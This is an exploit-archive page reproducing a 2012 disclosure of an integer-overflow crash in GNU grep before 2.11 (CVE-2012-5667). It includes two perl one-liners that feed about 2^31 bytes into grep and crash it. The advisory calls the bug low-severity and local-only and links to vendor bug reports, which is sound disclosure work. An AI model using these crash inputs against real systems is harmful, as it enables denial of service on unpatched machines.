Skip to content
cyberexploits
doslinuxtext

Grep < 2.11 - Integer Overflow Crash (PoC)

Grep < 2.11 - Integer Overflow Crash (PoC)

Publié le 2012-12-31

Code source

Épinglé au commit 7eac4c3a2ce5
textplatforms/linux/dos/23779.txt7eac4c3a
raw
Grep <2.11 is vulnerable to int overflow exploitation.



http://lists.gnu.org/archive/html/bug-grep/2012-03/msg00007.html



Although it is patched in the recent Grep,

This update has not been pushed to the Ubuntu repos, or the Redhat

repos, leaving 99% of those OS's(and more) vulnerable.





There are also many other ways to do this bug.



It is low severity because it would be extremely hard to actually

exploit it, and it is a local exploit, and it is not run by root.



Found By: Security Researcher - Joshua Rogers





More:

https://bugzilla.redhat.com/show_bug.cgi?id=889935

https://bugs.launchpad.net/ubuntu/+source/grep/+bug/1091473

http://seclists.org/oss-sec/2012/q4/504

etc.



#There are many ways of doing this.



#Method one:

$ perl -e 'print "x"x(2**31)' | grep x > /dev/null

Segmentation fault (core dumped)





#Method two:

$ perl -e 'print "\nx"x(2**31)' | grep -c x > /dev/null





Twitter: https://twitter.com/MegaManSec





CVE: CVE-2012-5667

-- 

*Joshua Rogers* - Retro Game Collector && IT Security Specialist

gpg pubkey <http://www.internot.info/docs/gpg_pubkey.asc.gpg>

Voir sur GitHub